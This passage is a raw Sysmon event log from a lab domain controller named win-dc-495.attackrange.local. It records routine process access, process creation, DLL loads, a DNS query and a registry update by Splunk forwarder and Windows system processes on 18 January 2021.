Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EF1-6005-E900-00000000A301}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.922{59A5CD1D-8EF1-6005-E900-00000000A301}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x80000000000000004321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.502{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 
10341000x80000000000000004320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.502{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.502{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.487{59A5CD1D-8EF1-6005-E800-00000000A301}44924496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.331{59A5CD1D-8EF1-6005-E800-00000000A301}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.436{59A5CD1D-8EF1-6005-E800-00000000A301}4492win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe 13241300x80000000000000004336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:36:54.645{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9e-0xfc3c9014) 10341000x80000000000000004340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:59.599{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EFB-6005-EA00-00000000A301}4636C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:59.599{59A5CD1D-8E46-6005-1600-00000000A301}15442100C:\Windows\system32\svchost.exe{59A5CD1D-8EFB-6005-EA00-00000000A301}4636C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:59.599{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:59.599{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:38.638{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F28-6005-EB00-00000000A301}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 